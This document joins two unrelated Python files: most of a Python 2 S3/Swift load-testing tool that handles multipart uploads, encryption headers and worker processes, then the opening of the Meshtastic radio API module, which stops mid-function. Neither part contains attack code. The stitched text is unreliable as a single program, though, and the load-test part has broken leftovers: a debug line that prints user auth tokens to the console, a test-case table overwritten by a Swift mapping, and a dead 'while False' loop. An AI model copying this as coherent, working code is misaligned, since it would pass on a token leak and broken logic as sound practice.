if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
# 同拷贝对象,若拷贝段操作先返回200 OK,并不代表拷贝成功。如果返回了200,但没有获取到ETag,将response修改为500错误。
if resp.status.startswith('200 ') and not resp.return_data:
logging.info('response 200 OK without ETag, set status code 500 InternalError')
resp.status = '500 InternalError'
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes,
'src:' + rest.headers['x-amz-copy-source'] + ':' + rest.headers[
'x-amz-copy-source-range'], resp.request_id, resp.status))
if resp.status.startswith('200 '):
parts_record += '%d:%s,' % (i, resp.return_data)
upload_id.append(parts_record)
# 记录各段信息到本地文件 ,parts_etag-x.dat,格式:桶名\t对象名\tupload_id\tpartNo:Etag,partNo:Etag,...
part_record_file = 'data/parts_etag-%d.dat' % process_id
parts_record_writer = None
parts_records = ''
for upload_id in upload_ids:
parts_records += '\t'.join(upload_id) + '\n'
try:
parts_record_writer = open(part_record_file, 'w')
parts_record_writer.write(parts_records)
except Exception, data:
logging.error('process [%d] write file %s error, %s' % (process_id, part_record_file, data))
finally:
if parts_record_writer:
try:
parts_record_writer.close()
except IOError:
pass
def complete_multi_upload(process_id, user, conn, result_queue):
# 从本地parts_etag-x.dat中加载本进程需要做的upload_ids。考虑到单upload_id多并发上传段场景,需要加载其它进程上传的段信息。
# 如3个用户,每用户3个并发,每个upload_id上传6个段,则每个upload_id 3个并发上传段,每个并发对每个upload_id上传2个段。
# parts_etag-0(usr0,p0,part1/4) parts_etag-1(usr0,p1,part2/5) parts_etag-2(usr1,p2,part3/6)
# parts_etag-3(usr1,p3,part1/4) parts_etag-4(usr0,p4,part2/5) parts_etag-5(usr1,p5,part3/6)
# parts_etag-0(usr2,p6,part1/4) parts_etag-1(usr0,p7,part2/5) parts_etag-2(usr1,p8,part3/6)
# p0,p1,p2需要顺序加载parts_etag-0, parts_etag-1, parts_etag-2,取里面属于自已的对象。
part_etags = {}
if not CONFIG['ConcurrentUpParts']:
part_files = [process_id]
else:
part_files = range(process_id / CONFIG['ThreadsPerUser'] * CONFIG['ThreadsPerUser'],
(process_id / CONFIG['ThreadsPerUser'] + 1) * CONFIG['ThreadsPerUser'])
for i in part_files:
part_record_file = 'data/parts_etag-%d.dat' % i
try:
with open(part_record_file, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
if not line.startswith('%d.%s\t' % (process_id, user.username)):
continue
line_array = line.strip().split('\t')
if len(line_array) != 5 or not line_array[4]:
logging.warn('partEtag record error [%s]' % line)
continue
# 用户名\t桶名\t对象名\tupoadID\tpartNo:etag,partN0:etag,..
# 合并相同的upload_id多并发上传的段信息
if line_array[3] in part_etags:
part_etags[line_array[3]] = (
line_array[1], line_array[2], line_array[4] + part_etags[line_array[3]][2])
else:
part_etags[line_array[3]] = (line_array[1], line_array[2], line_array[4])
fd.close()
logging.debug('process %d load parts_etag file %s end' % (process_id, part_record_file))
except Exception, data:
logging.info(
"load parts_etag from file %s for process %d error, [%r], exit" % (part_record_file, process_id, data))
continue
if not part_etags:
logging.error('process %d load nothing from files %r ' % (process_id, part_files))
return
request_type = 'CompleteMultiUpload'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['content-type'] = 'application/xml'
for key, value in part_etags.items():
rest.bucket = value[0]
rest.key = value[1]
rest.queryArgs['uploadId'] = key
# 将parts信息排序
parts_dict = {}
for item in value[2].split(','):
if ':' in item:
parts_dict[int(item.split(':')[0])] = item.split(':')[1]
# 组装xml body
if not parts_dict:
continue
rest.sendContent = '<CompleteMultipartUpload>'
for part_index in sorted(parts_dict):
if not parts_dict[part_index]:
continue
rest.sendContent += '<Part><PartNumber>%d</PartNumber><ETag>%s</ETag></Part>' % (
part_index, parts_dict[part_index])
rest.sendContent += '</CompleteMultipartUpload>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def multi_parts_upload(process_id, user, conn, result_queue):
rest = s3PyCmd.S3RequestDescriptor(request_type='', ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.bucket = CONFIG['BucketNameFixed']
rest.key = CONFIG['ObjectNameFixed']
i = 0
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
# 1. 初始化对象多段上传任务。
rest.requestType = 'InitMultiUpload'
rest.method = 'POST'
rest.headers = {}
rest.queryArgs = {}
rest.sendContent = ''
rest.queryArgs['uploads'] = None
if CONFIG['PutWithACL']:
rest.headers['x-amz-acl'] = CONFIG['PutWithACL']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG[
'SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG[
'SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, rest.requestType, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
upload_id = resp.return_data
logging.info("upload id: %s" % upload_id)
# 2. 串行上传多段
rest.requestType = 'UploadPart'
rest.method = 'PUT'
rest.headers = {}
rest.queryArgs = {}
rest.sendContent = ''
rest.headers['content-type'] = 'application/octet-stream'
rest.queryArgs['uploadId'] = upload_id
part_number = 1
fixed_size = False
part_etags = {}
while part_number <= CONFIG['PartsForEachUploadID']:
rest.queryArgs['partNumber'] = str(part_number)
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(
rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
if not fixed_size:
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, rest.requestType, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
if resp.status.startswith('200 '):
part_etags[part_number] = resp.return_data
part_number += 1
# 3. 合并段
rest.requestType = 'CompleteMultiUpload'
rest.method = 'POST'
rest.headers = {}
rest.queryArgs = {}
rest.headers['content-type'] = 'application/xml'
rest.queryArgs['uploadId'] = upload_id
rest.sendContent = '<CompleteMultipartUpload>'
for part_index in sorted(part_etags):
rest.sendContent += '<Part><PartNumber>%d</PartNumber><ETag>%s</ETag></Part>' % (
part_index, part_etags[part_index])
rest.sendContent += '</CompleteMultipartUpload>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, rest.requestType, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
# 并发进程入口
def start_process(process_id, user, test_case, results_queue, valid_start_time, valid_end_time, current_threads, lock,
conn=None, call_itself=False):
global OBJECTS, CONFIG
# 如果混合操作自身调用,不增用户,不等待。
if not call_itself:
lock.acquire()
current_threads.value += 1
lock.release()
# 等待所有用户启动
while True:
# 如果时间已经被其它进程刷新,直接跳过。
if valid_start_time.value == float(sys.maxint):
# 若所有用户均启动,记为合法的有效开始时间
if current_threads.value == CONFIG['Threads']:
valid_start_time.value = time.time() + 2
else:
time.sleep(.06)
else:
break
time.sleep(2)
# 若长连接分配连接。考虑混合操作重复执行场景,若已有连接,不分配连接
if not conn:
conn = s3PyCmd.MyHTTPConnection(host=CONFIG['OSCs'], is_secure=CONFIG['IsHTTPs'],
ssl_version=CONFIG['sslVersion'], timeout=CONFIG['ConnectTimeout'],
serial_no=process_id, long_connection=CONFIG['LongConnection'],
conn_header=CONFIG['ConnectionHeader'])
from swiftIamTool import RestRequest
rest = RestRequest()
if test_case != 900:
try:
method_to_call = globals()[TESTCASES[test_case].split(';')[1]]
logging.debug('method %s called ' % method_to_call)
method_to_call(process_id, user, conn, results_queue)
except KeyboardInterrupt:
pass
except Exception, e:
logging.error('Call method for test case %d except: %s' % (test_case, e))
elif test_case == 900:
test_cases = [int(case) for case in CONFIG['MixOperations'].split(',')]
tmp = 0
while tmp < CONFIG['MixLoopCount']:
t1,t2,t3,t4=rest.GetUserToken(username=user.username)
print "t1================================================================================="+t1+"|"+t3
logging.debug("loop count: %d " % tmp)
tmp += 1
for case in test_cases:
logging.debug("case %d in mix loop called " % case)
start_process(process_id, user, case, results_queue, valid_start_time,
valid_end_time, current_threads, lock, conn, True)
# 如果混合操作自身调用,则直接返回,不断连接,不减用户。
if call_itself:
return
# close connection for this thread
if conn:
conn.close_connection()
# 执行完业务后,当前用户是第一个退出的用户,记为合法的结束时间
if current_threads.value == CONFIG['Threads']:
valid_end_time.value = time.time()
logging.info('thread [' + str(process_id) + '], exit, set valid_end_time = ' + str(valid_end_time.value))
# 退出
lock.acquire()
current_threads.value -= 1
lock.release()
logging.info('process_id [%d] exit, set current_threads.value = %d' % (process_id, current_threads.value))
def get_total_requests():
global OBJECTS, CONFIG
if CONFIG['Testcase'] == 100:
return CONFIG['RequestsPerThread'] * CONFIG['Threads']
elif CONFIG['Testcase'] in (101, 103, 104, 105, 106, 111, 112, 141, 142, 143, 151, 152, 153):
return CONFIG['BucketsPerUser'] * CONFIG['Users']
elif CONFIG['Testcase'] in (201,):
return CONFIG['ObjectsPerBucketPerThread'] * CONFIG['BucketsPerUser'] * CONFIG['Threads'] * CONFIG[
'PutTimesForOneObj']
elif CONFIG['Testcase'] in (202, 203, 204, 206, 207, 211):
if len(OBJECTS) > 0:
return len(OBJECTS)
# 如果从data下加载到对象版本数据,则不清楚总数。
if CONFIG['Testcase'] in (202, 204):
for i in range(CONFIG['Threads']):
obj_v_file = 'data/objv-%d.dat' % i
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
return -1
return CONFIG['ObjectsPerBucketPerThread'] * CONFIG['BucketsPerUser'] * CONFIG['Threads']
elif CONFIG['Testcase'] in (205,):
return int((CONFIG['ObjectsPerBucketPerThread'] + CONFIG['DeleteObjectsPerRequest'] - 1) / CONFIG[
'DeleteObjectsPerRequest']) * CONFIG['BucketsPerUser'] * CONFIG['Threads']
elif CONFIG['Testcase'] in (216,):
return CONFIG['ObjectsPerBucketPerThread'] * CONFIG['BucketsPerUser'] * CONFIG['Threads'] * (
2 + CONFIG['PartsForEachUploadID'])
# 对于某些请求无法计算请求总量,返回-1
else:
return -1
# return True: pass, False: failed
def precondition():
global CONFIG, TESTCASES
# 检查当前用户是否root用户
import getpass
import platform
if 'root' != getpass.getuser() and platform.system().lower().startswith('linux'):
return False, "\033[1;31;40m%s\033[0m Please run with root account other than '%s'" % (
"[ERROR]", getpass.getuser())
# 检查测试用例是否支持
if CONFIG['Testcase'] not in TESTCASES:
return False, "\033[1;31;40m%s\033[0m Test Case [%d] not supported" % ("[ERROR]", CONFIG['Testcase'])
# 如果开启服务器端加密功能,必须使用https+AWSV4
if CONFIG['SrvSideEncryptType']:
if not CONFIG['IsHTTPs']:
CONFIG['IsHTTPs'] = True
logging.info('change IsHTTPs to True while use SrvSideEncryptType')
if CONFIG['AuthAlgorithm'] != 'AWSV4':
CONFIG['AuthAlgorithm'] = 'AWSV4'
logging.info('change AuthAlgorithm to AWSV4 while use SrvSideEncryptType')
# 加载用户,检查user是否满足要求
logging.info('loading users...')
read_users()
if CONFIG['Users'] > len(USERS):
return False, "\033[1;31;40m%s\033[0m Not enough users in users.dat after index %d: %d < [Users=%d]" % (
"[ERROR]", CONFIG['UserStartIndex'], len(USERS), CONFIG['Users'])
# 测试网络连接
if CONFIG['IsHTTPs']:
try:
import ssl as ssl
if not CONFIG['sslVersion']:
CONFIG['sslVersion'] = 'SSLv23'
logging.info('import ssl module done, config ssl Version: %s' % CONFIG['sslVersion'])
except ImportError:
logging.info('import ssl module error')
return False, 'Python version %s ,import ssl module error'
oscs = CONFIG['OSCs'].split(',')
for end_point in oscs:
print 'Testing connection to %s\t' % end_point.ljust(20),
sys.stdout.flush()
test_conn = None
try:
test_conn = s3PyCmd.MyHTTPConnection(host=end_point, is_secure=CONFIG['IsHTTPs'],
ssl_version=CONFIG['sslVersion'], timeout=60, serial_no=0,
long_connection=True)
test_conn.connect_connection()
ssl_ver = ''
if CONFIG['IsHTTPs']:
if Util.compareVersion(sys.version.split()[0], '2.7.9') < 0:
ssl_ver = test_conn.connection.sock._sslobj.cipher()[1]
else:
ssl_ver = test_conn.connection.sock._sslobj.version()
rst = '\033[1;32;40mSUCCESS %s\033[0m'.ljust(10) % ssl_ver
else:
rst = '\033[1;32;40mSUCCESS\033[0m'.ljust(10)
print rst
logging.info(
'connect %s success, python version: %s, ssl_ver: %s' % (
end_point, sys.version.replace('\n', ' '), ssl_ver))
except Exception, data:
logging.error('Caught exception when testing connection with %s, except: %s' % (end_point, data))
print '\033[1;31;40m%s *%s*\033[0m' % (' Failed'.ljust(8), data)
return False, 'Check connection failed'
finally:
if test_conn:
test_conn.close_connection()
# 创建data目录
if not os.path.exists('data'):
os.mkdir('data')
return True, 'check passed'
def get_objects_from_file(file_name):
global OBJECTS
if not os.path.exists(file_name):
print 'ERROR,the file configed %s in config.dat not exist' % file_name
sys.exit(0)
try:
with open(file_name, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
if len(line.split(',')) != 12:
continue
if line.split(',')[2][1:].find('/') == -1:
continue
if line.split(',')[11].strip().startswith('200 OK'):
OBJECTS.append(line.split(',')[2][1:])
fd.close()
logging.info('load file %s end, get objects [%d]' % (file_name, len(OBJECTS)))
except Exception, data:
msg = 'load file %s except, %s' % (file_name, data)
logging.error(msg)
print msg
sys.exit()
if len(OBJECTS) == 0:
print 'get no objects in file %s' % file_name
sys.exit()
# running config
CONFIG = {}
# test users
USERS = []
OBJECTS = []
TESTCASES_SWIFT = {100: 'swiftListUserContainers;swiftlist_user_containers',
101: 'swiftCreateContainer;swiftcreate_container',
102: 'swiftListObjectsInContainer;swiftlist_objects_in_container',
103: 'swiftHeadContainer;swifthead_container',
104: 'swiftDeleteContainer;swiftdelete_container',
201: 'swiftPutObject;swiftput_object',
202: 'swiftGetObject;swiftget_object',
203: 'swiftHeadObject;swifthead_object',
204: 'swiftDeleteObject;swiftdelete_object',
217: 'swiftUploadDynamicBigObject;swiftupload_dynamic_big_object',
218: 'swiftUploadStaticBigObject;swiftupload_static_big_object',
219: 'swiftDeleteDynamicBigObject;swiftdelete_dynamic_big_object',
220: 'swiftDeleteStaticBigObject;swiftdelete_static_big_object',
900: 'MixOperation;',
}
TESTCASES = {100: 'ListUserBuckets;list_user_buckets',
101: 'CreateBucket;create_bucket',
102: 'ListObjectsInBucket;list_objects_in_bucket',
103: 'HeadBucket;head_bucket',
104: 'DeleteBucket;delete_bucket',
105: 'BucketDelete;bucket_delete',
106: 'OptionsBucket;options_bucket',
111: 'PutBucketVersiong;put_bucket_versioning',
112: 'GetBucketVersioning;get_bucket_versioning',
141: 'PutBucketWebsite;put_bucket_website',
142: 'GetBucketWebsite;get_bucket_website',
143: 'DeleteBucketWebsite;delete_bucket_website',
151: 'PutBucketCors;put_bucket_cors',
152: 'GetBucketCors;get_bucket_cors',
153: 'DeleteBucketCors;delete_bucket_cors',
161: 'PutBucketTag;put_bucket_tag',
162: 'GetBucketTag;get_bucket_tag',
163: 'DeleteBucketTag;delete_bucket_tag',
201: 'PutObject;put_object',
202: 'GetObject;get_object',
203: 'HeadObject;head_object',
204: 'DeleteObject;delete_object',
205: 'DeleteMultiObjects;delete_multi_objects',
206: 'CopyObject;copy_object',
207: 'RestoreObject;restore_object',
211: 'InitMultiUpload;init_multi_upload',
212: 'UploadPart;upload_part',
213: 'CopyPart;copy_part',
214: 'CompleteMultiUpload;complete_multi_upload',
215: 'AbortMultiUpload;abort_multi_upload',
216: 'MultiPartsUpload;multi_parts_upload',
900: 'MixOperation;'
}
TESTCASES=TESTCASES_SWIFT
if __name__ == '__main__':
if not os.path.exists('log'):
os.mkdir('log')
logging.config.fileConfig('logging.conf')
version = '----------------s3PyTool: v20170215, Python: %s----------------' % sys.version.split(' ')[0]
logging.info(version)
print version
# 加载指定配置文件
logging.info('loading config...')
config_file = 'config.dat'
if len(sys.argv[1:]) > 2:
config_file = sys.argv[1:][2]
read_config(config_file)
print 'Config loaded'
print str(CONFIG).replace('\'', '')
logging.info(CONFIG)
# 如果携带参数,则使用参数,覆盖配置文件。
if len(sys.argv[1:]) > 0:
CONFIG['Testcase'] = int(sys.argv[1:][0])
if len(sys.argv[1:]) > 1:
CONFIG['Users'] = int(sys.argv[1:][1])
CONFIG['Threads'] = CONFIG['Users'] * CONFIG['ThreadsPerUser']
# 启动前检查
check_result, msg = precondition()
if not check_result:
print 'Check error, [%s] \nExit...' % msg
sys.exit()
if CONFIG['objectDesFile']:
# 判断操作类型,其它操作不预读文件,即使配置了objectDesFile
obj_op = ['202', '203', '204', '213']
if str(CONFIG['Testcase']) in obj_op or (
CONFIG['Testcase'] == 900 and (set(CONFIG['MixOperations'].split(',')) & set(obj_op))):
print 'begin to read object file %s' % CONFIG['objectDesFile']
get_objects_from_file(CONFIG['objectDesFile'])
print 'finish, get %d objects' % len(OBJECTS)
start_wait = False
if start_wait:
tip = '''
--------------------------------------------------------------------------------
Important: This is the way how we can run multi-clients at the same time.
Assuming all the client nodes are sync with the time server.
If now 02:10:00, enter 12 to change the minute, then it will start at 02:12:00
--------------------------------------------------------------------------------
'''
print '\033[1;32;40m%s\033[0m' % tip
import threading
def input_func(input_data):
input_data['data'] = raw_input()
while False:
n = datetime.datetime.now()
print 'Now it\'s %2d:\033[1;32;40m%2d\033[0m:%2d, please input to change the minute' % (
n.hour, n.minute, n.second),
print '(Press \'Enter\' or wait 30 sec to run, \'q\' to exit): ',
try:
input_data = {'data': 'default'}
t = threading.Thread(target=input_func, args=(input_data,))
t.daemon = True
t.start()
t.join(30) # 等待30秒
if input_data['data'] == 'q':
sys.exit()
elif '' == input_data['data'] or 'default' == input_data['data']:
break
try:
input_data['data'] = int(input_data['data'])
except ValueError:
print '[ERROR] I only receive numbers (*>﹏<*)'
continue
n = datetime.datetime.now()
diff = input_data['data'] * 60 - (n.minute * 60 + n.second)
if diff > 0:
print 'Wait for %d seconds...' % diff
time.sleep(diff)
break
else:
break
except KeyboardInterrupt:
print '\nSystem exit...'
sys.exit()
n = datetime.datetime.now()
msg = 'Start at %s, pid:%d. Press Ctr+C to stop. Screen Refresh Interval: 3 sec' % (
time.strftime('%X %x %Z'), os.getpid())
print msg
logging.info(msg)
# valid_start_time: 所有并发均启动。
# valid_end_time: 第一个并发退出时刻。
# current_threads:当前运行的并发数。-2表示手动退出,-1表示正常退出。
valid_start_time = multiprocessing.Value('d', float(sys.maxint))
valid_end_time = multiprocessing.Value('d', float(sys.maxint))
current_threads = multiprocessing.Value('i', 0)
# results_queue, 请求记录保存队列。多进程公用。
results_queue = multiprocessing.Queue(0)
# 启动统计计算结果的进程 。用于从队列取请求记录,保存到本地,并同时刷新实时结果。
results_writer = results.ResultWriter(CONFIG, TESTCASES[CONFIG['Testcase']].split(';')[0].split(';')[0],
results_queue, get_total_requests(),
valid_start_time, valid_end_time, current_threads)
results_writer.daemon = True
results_writer.name = 'resultsWriter'
results_writer.start()
print 'resultWriter started, pid: %d' % results_writer.pid
# 增加该进程的优先级
os.system('renice -19 -p ' + str(results_writer.pid) + ' >/dev/null 2>&1')
time.sleep(.2)
# 顺序启动多个业务进程
process_list = []
# 多进程公用锁
lock = multiprocessing.Lock()
esc = chr(27) # escape key
i = 0
while i < CONFIG['Threads']:
p = multiprocessing.Process(target=start_process, args=(
i, USERS[i / CONFIG['ThreadsPerUser']], CONFIG['Testcase'], results_queue, valid_start_time, valid_end_time,
current_threads,
lock, None,
False))
i += 1
p.daemon = True
p.name = 'worker-%d' % i
p.start()
# 将各工作进程的优先级提高1
os.system('renice -1 -p ' + str(p.pid) + ' >/dev/null 2>&1')
process_list.append(p)
logging.info('All %d threads started, valid_start_time: %.3f' % (len(process_list), valid_start_time.value))
# 请求未完成退出
def exit_force(signal_num, e):
msg = "\n\n\033[5;33;40m[WARN]Terminate Signal %d Received. Terminating... please wait\033[0m" % signal_num
logging.warn('%r' % msg)
print msg, '\nWaiting for all the threads exit....'
lock.acquire()
current_threads.value = -2
lock.release()
time.sleep(.1)
tmpi = 0
for j in process_list:
if j.is_alive():
if tmpi >= 100:
logging.info('force to terminate process %s' % j.name)
j.terminate()
else:
time.sleep(.1)
tmpi += 1
break
print "\033[1;32;40mWorkers exited.\033[0m Waiting results_writer exit...",
sys.stdout.flush()
while results_writer.is_alive():
current_threads.value = -2
tmpi += 1
if tmpi > 1000:
logging.warn('retry too many time, shutdown results_writer using terminate()')
results_writer.terminate()
time.sleep(.01)
print "\n\033[1;33;40m[WARN] Terminated\033[0m\n"
print version
sys.exit()
import signal
signal.signal(signal.SIGINT, exit_force)
signal.signal(signal.SIGTERM, exit_force)
time.sleep(1)
# 正常退出
stop_mark = False
while not stop_mark:
time.sleep(.3)
if CONFIG['RunSeconds'] and (time.time() - valid_start_time.value >= CONFIG['RunSeconds']):
logging.info('time is up, exit')
exit_force(99, None)
for j in process_list:
if j.is_alive():
break
stop_mark = True
for j in process_list:
j.join()
# 等待结果进程退出。
logging.info('Waiting results_writer to exit...')
while results_writer.is_alive():
current_threads.value = -1 # inform results_writer
time.sleep(.3)
print "\n\033[1;33;40m[WARN] Terminated after all requests\033[0m\n"
print version
|
__init__.py
|
"""
# an API for Meshtastic devices
Primary class: SerialInterface
Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)"
Source code on [github](https://github.com/meshtastic/Meshtastic-python)
properties of SerialInterface:
- radioConfig - Current radio configuration and device settings, if you write to this the new settings will be applied to
the device.
- nodes - The database of received nodes. Includes always up-to-date location and username information for each
node in the mesh. This is a read-only datastructure.
- nodesByNum - like "nodes" but keyed by nodeNum instead of nodeId
- myInfo - Contains read-only information about the local radio device (software version, hardware version, etc)
# Published PubSub topics
We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available
topics:
- meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB
- meshtastic.connection.lost - published once we've lost our link to the radio
- meshtastic.receive.text(packet) - delivers a received packet as a dictionary, if you only care about a particular
type of packet, you should subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive".
- meshtastic.receive.position(packet)
- meshtastic.receive.user(packet)
- meshtastic.receive.data.portnum(packet) (where portnum is an integer or well known PortNum enum)
- meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...)
We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for
that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet
you'll see the fields in the dictionary. decoded.data.payload will contain the raw bytes that were sent. If the packet was sent with
sendText, decoded.data.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for
unicode scripts they can be different.
# Example Usage
```
import meshtastic
from pubsub import pub
def onReceive(packet, interface): # called when a packet arrives
print(f"Received: {packet}")
def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio
# defaults to broadcast, specify a destination ID if you wish
interface.sendText("hello mesh")
pub.subscribe(onReceive, "meshtastic.receive")
pub.subscribe(onConnection, "meshtastic.connection.established")
# By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0
interface = meshtastic.SerialInterface()
```
"""
import pygatt
import google.protobuf.json_format
import serial
import threading
import logging
import sys
import random
import traceback
import time
import base64
import platform
import socket
from . import mesh_pb2, portnums_pb2, apponly_pb2, admin_pb2, environmental_measurement_pb2, remote_hardware_pb2, channel_pb2, radioconfig_pb2, util
from .util import fixme, catchAndIgnore, stripnl, DeferredExecution
from pubsub import pub
from dotmap import DotMap
from typing import *
from google.protobuf.json_format import MessageToJson
START1 = 0x94
START2 = 0xc3
HEADER_LEN = 4
MAX_TO_FROM_RADIO_SIZE = 512
defaultHopLimit = 3
"""A special ID that means broadcast"""
BROADCAST_ADDR = "^all"
"""A special ID that means the local node"""
LOCAL_ADDR = "^local"
# if using 8 bit nodenums this will be shortend on the target
BROADCAST_NUM = 0xffffffff
"""The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand
format is Mmmss (where M is 1+the numeric major number. i.e. 20120 means 1.1.20
"""
OUR_APP_VERSION = 20200
publishingThread = DeferredExecution("publishing")
class ResponseHandler(NamedTuple):
"""A pending response callback, waiting for a response to one of our messages"""
# requestId: int - used only as a key
callback: Callable
# FIXME, add timestamp and age out old requests
class KnownProtocol(NamedTuple):
"""Used to automatically decode known protocol payloads"""
name: str
# portnum: int, now a key
# If set, will be called to prase as a protocol buffer
protobufFactory: Callable = None
# If set, invoked as onReceive(interface, packet)
onReceive: Callable = None
def waitForSet(target, sleep=.1, maxsecs=20, attrs=()):
"""Block until the specified attributes are set. Returns True if config has been received."""
for _ in range(int(maxsecs/sleep)):
if all(map(lambda a: getattr(target, a, None), attrs)):
return True
time.sleep(sleep)
return False
class Node:
"""A model of a (local or remote) node in the mesh
Includes methods for radioConfig and channels
"""
def __init__(self, iface, nodeNum):
"""Constructor"""
self.iface = iface
self.nodeNum = nodeNum
self.radioConfig = None
self.channels = None
def showInfo(self):
"""Show human readable description of our node"""
print(self.radioConfig)
print("Channels:")
for c in self.channels:
if c.role != channel_pb2.Channel.Role.DISABLED:
cStr = MessageToJson(c.settings).replace("\n", "")
print(f" {channel_pb2.Channel.Role.Name(c.role)} {cStr}")
print(f"\nChannel URL {self.channelURL}")
def requestConfig(self):
"""
Send regular MeshPackets to ask for settings and channels
"""
self.radioConfig = None
self.channels = None
self.partialChannels = [] # We keep our channels in a temp array until finished
self._requestSettings()
def waitForConfig(self, maxsecs=20):
"""Block until radio config is received. Returns True if config has been received."""
return waitForSet(self, attrs=('radioConfig', 'channels'), maxsecs=maxsecs)
def writeConfig(self):
"""Write the current (edited) radioConfig to the device"""
if self.radioConfig == None:
raise Exception("No RadioConfig has been read")
p = admin_pb2.AdminMessage()
p.set_radio.CopyFrom(self.radioConfig)
self._sendAdmin(p)
logging.debug("Wrote config")
def writeChannel(self, channelIndex):
"""Write the current (edited) channel to the device"""
p = admin_pb2.AdminMessage()
p.set_channel.CopyFrom(self.channels[channelIndex])
self._sendAdmin(p)
logging.debug("Wrote channel {channelIndex}")
def getChannelByName(self, name):
"""Try to find the named channel or return None"""
for c in (self.channels or []):
if c.settings and c.settings.name == name:
return c
return None
def getDisabledChannel(self):
"""Return the first channel that is disabled (i.e. available for some new use)"""
for c in self.channels:
if c.role == channel_pb2.Channel.Role.DISABLED:
return c
return None
def _getAdminChannelIndex(self):
"""Return the channel number of the admin channel, or 0 if no reserved channel"""
c = self.getChannelByName("admin")
if c:
return c.index
else:
return 0
def setOwner(self, long_name, short_name=None):
"""Set device owner name"""
nChars = 3
minChars = 2
if long_name is not None:
long_name = long_name.strip()
if short_name is None:
words = long_name.split()
if len(long_name) <= nChars:
short_name = long_name
elif len(words) >= minChars:
short_name = ''.join(map(lambda word: word[0], words))
else:
trans = str.maketrans(dict.fromkeys('aeiouAEIOU'))
short_name = long_name[0] + long_name[1:].translate(trans)
if len(short_name) < nChars:
short_name = long_name[:nChars]
p = admin_pb2.AdminMessage()
if long_name is not None:
p.set_owner.long_name = long_name
if short_name is not None:
short_name = short_name.strip()
if len(short_name) > nChars:
short_name = short_name[:nChars]
p.set_owner.short_name = short_name
return self._sendAdmin(p)
@property
def channelURL(self):
"""The sharable URL that describes the current channel
"""
# Only keep the primary/secondary channels, assume primary is first
channelSet = apponly_pb2.ChannelSet()
for c in self.channels:
if c.role != channel_pb2.Channel.Role.DISABLED:
